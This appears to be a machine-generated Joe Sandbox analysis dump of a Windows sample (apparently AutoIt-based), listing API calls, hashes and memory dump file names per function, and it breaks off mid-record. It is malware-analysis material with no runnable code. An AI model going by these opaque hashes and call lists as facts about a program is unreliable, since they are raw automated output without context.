                                              • Instruction ID: 7430671c24e8b5ed4fcdad0280fbafc6394564f600de0aaf701ccfd623c790b0
                                              • Opcode Fuzzy Hash: 45cb421193cdce6d9c1f55aa1add518e93c70bd4e16d2736529b73e1cfc21bd9
                                              • Instruction Fuzzy Hash: FC51983460020AEFDF26CF68C888BAEBBF9EF47314F154229E851AB2D0D7759904CB51
                                              APIs
                                                • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0034179A
                                              • GetWindowRect.USER32(?,?), ref: 003417FE
                                              • ScreenToClient.USER32(?,?), ref: 0034181B
                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0034182C
                                              • EndPaint.USER32(?,?), ref: 00341876
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                              • String ID:
                                              • API String ID: 1827037458-0
                                              • Opcode ID: 0108e5aeb9e0c21d04e1b79d729c54d245060166f70a1b1179051d267ba3c555
                                              • Instruction ID: bb344da1bb468e1da3465bca1ce24902c3e2791dbb219fc9d884eaf13d898f7d
                                              • Opcode Fuzzy Hash: 0108e5aeb9e0c21d04e1b79d729c54d245060166f70a1b1179051d267ba3c555
                                              • Instruction Fuzzy Hash: EF418F31104A04AFD712DF25C884FAB7BE9EB49724F144669F998DB1A1C730A885DB62
                                              APIs
                                              • ShowWindow.USER32(004057B0,00000000,01605808,?,?,004057B0,?,003CB5A8,?,?), ref: 003CB712
                                              • EnableWindow.USER32(00000000,00000000), ref: 003CB736
                                              • ShowWindow.USER32(004057B0,00000000,01605808,?,?,004057B0,?,003CB5A8,?,?), ref: 003CB796
                                              • ShowWindow.USER32(00000000,00000004,?,003CB5A8,?,?), ref: 003CB7A8
                                              • EnableWindow.USER32(00000000,00000001), ref: 003CB7CC
                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 003CB7EF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID:
                                              • API String ID: 642888154-0
                                              • Opcode ID: 506ce6000701c89baed31d73fc50a075f4a7c9191ae55d615e526f7d2c25c8aa
                                              • Instruction ID: 50835289e1f23436f68cbe1947e45ed6abf2346f6ec270d4f892dd930ad6c5d0
                                              • Opcode Fuzzy Hash: 506ce6000701c89baed31d73fc50a075f4a7c9191ae55d615e526f7d2c25c8aa
                                              • Instruction Fuzzy Hash: BD412834600240AFDB26DF24C49AF94BBA1FF45350F1981A9ED48CF6A2C731AC56CB61
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,?,?,?,?,003B4E41,?,?,00000000,00000001), ref: 003B70AC
                                                • Part of subcall function 003B39A0: GetWindowRect.USER32(?,?), ref: 003B39B3
                                              • GetDesktopWindow.USER32 ref: 003B70D6
                                              • GetWindowRect.USER32(00000000), ref: 003B70DD
                                              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003B710F
                                                • Part of subcall function 003A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003A52BC
                                              • GetCursorPos.USER32(?), ref: 003B713B
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003B7199
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                              • String ID:
                                              • API String ID: 4137160315-0
                                              • Opcode ID: debbdde7eb32d9fae3202d72b51172fd962f3caf6126dccfda8cf355742e85ea
                                              • Instruction ID: f9b1bc79556e3ad5a63cb950e107a851b169f88f747c8368c6d7cdc51d6481f5
                                              • Opcode Fuzzy Hash: debbdde7eb32d9fae3202d72b51172fd962f3caf6126dccfda8cf355742e85ea
                                              • Instruction Fuzzy Hash: B531A172509305AFD721DF14C849F9BB7AAFBC9314F000919F68597191CB70EA09CBA2
                                              APIs
                                                • Part of subcall function 003980A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003980C0
                                                • Part of subcall function 003980A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003980CA
                                                • Part of subcall function 003980A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003980D9
                                                • Part of subcall function 003980A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003980E0
                                                • Part of subcall function 003980A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003980F6
                                              • GetLengthSid.ADVAPI32(?,00000000,0039842F), ref: 003988CA
                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003988D6
                                              • HeapAlloc.KERNEL32(00000000), ref: 003988DD
                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 003988F6
                                              • GetProcessHeap.KERNEL32(00000000,00000000,0039842F), ref: 0039890A
                                              • HeapFree.KERNEL32(00000000), ref: 00398911
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                              • String ID:
                                              • API String ID: 3008561057-0
                                              • Opcode ID: 130a8610648f42ce9a49214d4b9cce840f9edf5e0aefbdd3725ec6f09c6e49c5
                                              • Instruction ID: 8661dee3f94b4e7f2f1da579d4a9683f4f8ab6f69b079e0dbb9bd07fc6d6eacd
                                              • Opcode Fuzzy Hash: 130a8610648f42ce9a49214d4b9cce840f9edf5e0aefbdd3725ec6f09c6e49c5
                                              • Instruction Fuzzy Hash: F5117F71511609FFDF129FA4DC09FBE7BADEB86315F154029E845D7210CB32A944DB60
                                              APIs
                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003985E2
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 003985E9
                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003985F8
                                              • CloseHandle.KERNEL32(00000004), ref: 00398603
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00398632
                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00398646
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                              • String ID:
                                              • API String ID: 1413079979-0
                                              • Opcode ID: daa14c661247b0ecb7483cb44c2cccf0d1a1e0ccd646cc3cd5fd3dc38793d764
                                              • Instruction ID: 8683c495b74c872aa4341a01941fdb0bec93e2e37d3567226fe91898d1af2644
                                              • Opcode Fuzzy Hash: daa14c661247b0ecb7483cb44c2cccf0d1a1e0ccd646cc3cd5fd3dc38793d764
                                              • Instruction Fuzzy Hash: 881147B2500249AFDF029FA4DD49FEA7BADEB49344F054065FE05A2160C6729D64EB60
                                              APIs
                                              • GetDC.USER32(00000000), ref: 0039B7B5
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0039B7C6
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0039B7CD
                                              • ReleaseDC.USER32(00000000,00000000), ref: 0039B7D5
                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0039B7EC
                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0039B7FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CapsDevice$Release
                                              • String ID:
                                              • API String ID: 1035833867-0
                                              • Opcode ID: 4bd69b129ea2b368b9699c00ee7320426be47bd8b84b68608f68d53688da4a46
                                              • Instruction ID: 267cf66d62a28af620f77d2b63760bd111dbfa897bcccb69a5dd0b8e5c6b1a60
                                              • Opcode Fuzzy Hash: 4bd69b129ea2b368b9699c00ee7320426be47bd8b84b68608f68d53688da4a46
                                              • Instruction Fuzzy Hash: 68017175A00219BFEF119BE69D45E5EBFADEF48711F004065FA04E7291D631AC10CF90
                                              APIs
                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00360193
                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 0036019B
                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003601A6
                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003601B1
                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 003601B9
                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 003601C1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Virtual
                                              • String ID:
                                              • API String ID: 4278518827-0
                                              • Opcode ID: 36b21cb38d18cfcdb9ba8da48c04f66594a0e8074fa55569bd02ce2e8fdf2828
                                              • Instruction ID: 6d8291223c248a1e40a0e8ccb5bc3aebd7abba42d72e2ef283b63d481a51eb77
                                              • Opcode Fuzzy Hash: 36b21cb38d18cfcdb9ba8da48c04f66594a0e8074fa55569bd02ce2e8fdf2828
                                              • Instruction Fuzzy Hash: E3016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C87941C7F5A864CBE5
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003A53F9
                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003A540F
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 003A541E
                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003A542D
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003A5437
                                              • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003A543E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                              • String ID:
                                              • API String ID: 839392675-0
                                              • Opcode ID: 9d149093bf145d8b7bba84d53f60a666f140736e3c78ec1369470fc798dd56f1
                                              • Instruction ID: 3ab8c71ac920b7e17b54dfd0832011a50286e04ab5f6848cfd2d161847f9abc6
                                              • Opcode Fuzzy Hash: 9d149093bf145d8b7bba84d53f60a666f140736e3c78ec1369470fc798dd56f1
                                              • Instruction Fuzzy Hash: 4EF03032241558BFE7225BA2DC0EEEF7B7DEFCAB11F040169FA05D1051D7A12A1187B5
                                              APIs
                                              • InterlockedExchange.KERNEL32(?,?), ref: 003A7243
                                              • EnterCriticalSection.KERNEL32(?,?,00350EE4,?,?), ref: 003A7254
                                              • TerminateThread.KERNEL32(00000000,000001F6,?,00350EE4,?,?), ref: 003A7261
                                              • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00350EE4,?,?), ref: 003A726E
                                                • Part of subcall function 003A6C35: CloseHandle.KERNEL32(00000000,?,003A727B,?,00350EE4,?,?), ref: 003A6C3F
                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 003A7281
                                              • LeaveCriticalSection.KERNEL32(?,?,00350EE4,?,?), ref: 003A7288
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                              • String ID:
                                              • API String ID: 3495660284-0
                                              • Opcode ID: 11b71ad913164b06b22495bab7836c5dfe75dcf7182f101acb3e2503e37234bf
                                              • Instruction ID: 14b4ddf1fade90ce303a5de8a90e7adf1b6a1686d65e0e562a5dc9ed05add198
                                              • Opcode Fuzzy Hash: 11b71ad913164b06b22495bab7836c5dfe75dcf7182f101acb3e2503e37234bf
                                              • Instruction Fuzzy Hash: C1F03A3A540612AFE7131B64ED8CEDA773EEF45712F150932F602D50A0CB766801CB50
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0039899D
                                              • UnloadUserProfile.USERENV(?,?), ref: 003989A9
                                              • CloseHandle.KERNEL32(?), ref: 003989B2
                                              • CloseHandle.KERNEL32(?), ref: 003989BA
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 003989C3
                                              • HeapFree.KERNEL32(00000000), ref: 003989CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                              • String ID:
                                              • API String ID: 146765662-0
                                              • Opcode ID: 3bf8de92c5b4ece72babe45ba2712b70bba24c8275e1a0b29f6fdfed18b5e38f
                                              • Instruction ID: 2b54b5f2ea5485ab74f8bfab3cac73a19d546e8d02d729d5aecd0aec00f3796d
                                              • Opcode Fuzzy Hash: 3bf8de92c5b4ece72babe45ba2712b70bba24c8275e1a0b29f6fdfed18b5e38f
                                              • Instruction Fuzzy Hash: D5E05276104505FFDA022FE6EC0CD5ABB6EFB89762B548632F219C1470CB32A461DB50
                                              APIs
                                              • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003D2C7C,?), ref: 003976EA
                                              • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003D2C7C,?), ref: 00397702
                                              • CLSIDFromProgID.OLE32(?,?,00000000,003CFB80,000000FF,?,00000000,00000800,00000000,?,003D2C7C,?), ref: 00397727
                                              • _memcmp.LIBCMT ref: 00397748
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: FromProg$FreeTask_memcmp
                                              • String ID: ,,=
                                              • API String ID: 314563124-2941206825
                                              • Opcode ID: 15d5c619430c0e9eb80e5a0d9a7deae6c5c663ec617f47d3041ab09ce90d47d8
                                              • Instruction ID: 2f8199459b4b68227ff3cd27c7b874f22e1ead26db16a9615d44dbf56e00dffe
                                              • Opcode Fuzzy Hash: 15d5c619430c0e9eb80e5a0d9a7deae6c5c663ec617f47d3041ab09ce90d47d8
                                              • Instruction Fuzzy Hash: E281E975A10109EFCF05DFA4C984EEEB7B9FF89315F204558E506AB290DB71AE06CB60
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 003B8613
                                              • CharUpperBuffW.USER32(?,?), ref: 003B8722
                                              • VariantClear.OLEAUT32(?), ref: 003B889A
                                                • Part of subcall function 003A7562: VariantInit.OLEAUT32(00000000), ref: 003A75A2
                                                • Part of subcall function 003A7562: VariantCopy.OLEAUT32(00000000,?), ref: 003A75AB
                                                • Part of subcall function 003A7562: VariantClear.OLEAUT32(00000000), ref: 003A75B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4237274167-1221869570
                                              • Opcode ID: bbd975554a4eff8f4481b59a14010a453bb410a5f7ebe5f1ef07e28f2bde630f
                                              • Instruction ID: 6eb84028c5ff028bc848a9c39d60ca1fd1d73924676f1c0d67cc92e38e569ca5
                                              • Opcode Fuzzy Hash: bbd975554a4eff8f4481b59a14010a453bb410a5f7ebe5f1ef07e28f2bde630f
                                              • Instruction Fuzzy Hash: F9918E716043019FC711DF24C48599BBBE8EF89718F14896EF98ACB761DB31E905CB51
                                              APIs
                                                • Part of subcall function 0035FC86: _wcscpy.LIBCMT ref: 0035FCA9
                                              • _memset.LIBCMT ref: 003A2B87
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003A2BB6
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003A2C69
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003A2C97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info$Default_memset_wcscpy
                                              • String ID: 0
                                              • API String ID: 4152858687-4108050209
                                              • Opcode ID: ed2501f65427b9d7eb44cd8310e0a54a49d65e6d75dac1f9438bd9368738f3ff
                                              • Instruction ID: 1f12dd542b580d265f00246200647d187b8ae9bcf1c4959ac2f0f65da508e850
                                              • Opcode Fuzzy Hash: ed2501f65427b9d7eb44cd8310e0a54a49d65e6d75dac1f9438bd9368738f3ff
                                              • Instruction Fuzzy Hash: 7051AC716083009FD72A9F2CC845A6FB7E8EF8A320F054A2DF895D7190DB74DD048B66
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memmove$_free
                                              • String ID: 3c5$_5
                                              • API String ID: 2620147621-2150917133
                                              • Opcode ID: 5fda7ed535bef3a005af45b2b34e6c6cb5aa2505c5ec4d2feae671778797569d
                                              • Instruction ID: 56dc598cdc5da04ad3bf41a39b25cc4127b1666ec98dc8f7ba22f480954d4200
                                              • Opcode Fuzzy Hash: 5fda7ed535bef3a005af45b2b34e6c6cb5aa2505c5ec4d2feae671778797569d
                                              • Instruction Fuzzy Hash: 07517CB16087418FDB26CF29C481B6FBBE5BF85350F05892DE98987360D731E905CB82
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355354729.00000000003FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355380683.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_340000_OKkUGRkZV7.jbxd
                                              Similarity
                                              • API ID: _memset$_memmove
                                              • String ID: 3c5$ERCP
                                              • API String ID: 2532777613-3339050422
                                              • Opcode ID: e7f46a3af0dc2dc31307e62e91cd710004bb4f924dda2b3e6f6630a104780c48
                                              • Instruction ID: 2a14e85183f511e7b8678312a8d59c28694fe9097911bbd7a3acfe8be7bffb19
                                              • Opcode Fuzzy Hash: e7f46a3af0dc2dc31307e62e91cd710004bb4f924dda2b3e6f6630a104780c48
                                              • Instruction Fuzzy Hash: 7A51A471900709DFDB26CF55C982BAAB7F8EF44315F61896EE94ACB260E770E944CB40
                                              APIs
                                              • _memset.LIBCMT ref: 003A27C0
                                              • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003A27DC
                                              • DeleteMenu.USER32(?,00000007,00000000), ref: 003A2822
                                              • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00405890,00000000), ref: 003A286B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1355166000.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                              • Associated: 00000000.00000002.1355134737.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1355281769.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
